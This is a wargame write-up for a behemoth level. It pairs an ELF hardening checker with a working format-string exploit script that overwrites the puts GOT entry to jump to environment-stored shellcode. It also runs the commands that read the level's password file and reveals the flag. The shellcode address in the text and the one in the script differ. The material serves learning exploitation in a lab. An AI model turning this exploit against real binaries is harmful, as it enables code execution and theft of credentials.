behemoth4 | Avishai’s CTF Writeups


First, I created a profile.rr2 file and put the following content in it:

program=/behemoth/behemoth3
stdin=input

Then, I wrote the payload into the input file:

python3 payload.py > input

After that, to debug with r2 using the given input, I can run this line:

r2 -e dbg.profile=profile.rr2

First, we can see that the binary doesn't use ASLR, and RELRO is turned off.
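Those two properties are exactly what make the rest of this level possible, so it is worth being able to check them without a debugger. The following script is an added example, not part of the original writeup: it reads the PIE type and the RELRO state (none, partial, full) straight from an ELF's headers, the same facts r2 reports above. Since no binary is embedded here, `build_elf32` constructs minimal header-only ELF32 images as test input; the parser itself also understands 64-bit files.

```python
import struct

PT_DYNAMIC, PT_GNU_RELRO = 2, 0x6474e552
DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 24, 30, 0x6ffffffb
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

def elf_hardening(data):
    """Report PIE and RELRO state of an ELF image given as bytes (32- or 64-bit)."""
    if data[:4] != b'\x7fELF':
        raise ValueError("not an ELF image")
    is64, end = data[4] == 2, ('<' if data[5] == 1 else '>')
    e_type, = struct.unpack_from(end + 'H', data, 16)
    if is64:   # Elf64_Ehdr / Elf64_Phdr / Elf64_Dyn layouts
        e_phoff, = struct.unpack_from(end + 'Q', data, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + 'HH', data, 54)
        phdr_fmt, dyn_fmt, off_idx, size_idx = end + 'IIQQQQQQ', end + 'qQ', 2, 5
    else:      # Elf32_Ehdr / Elf32_Phdr / Elf32_Dyn layouts
        e_phoff, = struct.unpack_from(end + 'I', data, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + 'HH', data, 42)
        phdr_fmt, dyn_fmt, off_idx, size_idx = end + 'IIIIIIII', end + 'iI', 1, 4
    has_relro, dynamic = False, None
    for i in range(e_phnum):
        ph = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        if ph[0] == PT_GNU_RELRO:        # region (GOT included) that ld.so remaps read-only
            has_relro = True
        elif ph[0] == PT_DYNAMIC:        # dynamic section: (file offset, size)
            dynamic = (ph[off_idx], ph[size_idx])
    bind_now = False
    if dynamic:
        for pos in range(dynamic[0], dynamic[0] + dynamic[1], struct.calcsize(dyn_fmt)):
            tag, val = struct.unpack_from(dyn_fmt, data, pos)
            if tag == 0:                 # DT_NULL terminates the table
                break
            # any of these makes ld.so resolve all imports before main(), so the whole GOT can be read-only
            if tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW) or (tag == DT_FLAGS_1 and val & DF_1_NOW):
                bind_now = True
    relro = 'full' if has_relro and bind_now else 'partial' if has_relro else 'none'
    return {'pie': e_type == 3, 'relro': relro}   # e_type 3 is ET_DYN

def build_elf32(relro, bind_now, pie):
    """Constructed test input: a minimal, non-runnable ELF32 carrying only the headers the check reads."""
    dyn = struct.pack('<iI', DT_FLAGS, DF_BIND_NOW if bind_now else 0) + struct.pack('<iI', 0, 0)
    phdrs = [(PT_DYNAMIC, 0x100, 0, 0, len(dyn), len(dyn), 6, 4)]
    if relro:
        phdrs.append((PT_GNU_RELRO, 0, 0, 0, 0, 0, 4, 1))
    ehdr = b'\x7fELF\x01\x01\x01' + bytes(9) + struct.pack(
        '<HHIIIIIHHHHHH', 3 if pie else 2, 3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    body = ehdr + b''.join(struct.pack('<IIIIIIII', *p) for p in phdrs)
    return body.ljust(0x100, b'\0') + dyn
```

On a real file, `elf_hardening(open(path, 'rb').read())` gives the same verdict; a binary like this level's reports `{'pie': False, 'relro': 'none'}`, which is the combination that leaves the GOT writable at a fixed address.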

So, let's try a format string attack to overwrite the address of the puts function with our shellcode address.

Find the address to overwrite: the address is 0x0804b218. The address we want to insert is 0xffffd53f (same as the last level: put the shellcode in an environment variable and find its address).

The Python script for creating the payload is here: [level4.py]

from pwn import p32
import sys

address_of_puts = 0x0804b218        # GOT entry of puts (writable, since RELRO is off)
address_of_shellcode = 0xffffd510   # address of the shellcode stored in the environment

# Four target addresses, one per byte of the value to write. Each is preceded by
# 4 bytes of junk so that every "%<width>x" consumes the junk and the "%n" that
# follows it lands on the address that comes next on the stack.
payload = b'JUNK' + p32(address_of_puts)
payload += b'JUNK' + p32(address_of_puts + 1)
payload += b'JUNK' + p32(address_of_puts + 2)
payload += b'JUNK' + p32(address_of_puts + 3)

printed_chars = len(payload)   # characters printf has output so far

# Write the address byte by byte, lowest byte first. Each %n stores the full
# running count, but the next write overwrites its upper bytes, so only the
# low byte of the count has to match.
for shift in (0, 8, 16, 24):
    byte_to_insert = (address_of_shellcode >> shift) & 0xff
    res = byte_to_insert - printed_chars
    # add multiples of 0x100 until the width is larger than 4;
    # this leaves the low byte of the running count unchanged
    while res <= 4:
        res += 0x100
    payload += b'%' + str(res).encode() + b'x' + b'%n'
    printed_chars += res
    # debug output goes to stderr so it never ends up inside the payload file
    print("byte:", hex(byte_to_insert), "width:", res, file=sys.stderr)

sys.stdout.buffer.write(payload)

After building the payload, all that's left is to run this:

(python3 payload.py;cat) | /behemoth/behemoth3

and then read the password:

cat /etc/behemoth_pass/behemoth4
hpjUdlG723

Flag: hpjUdlG723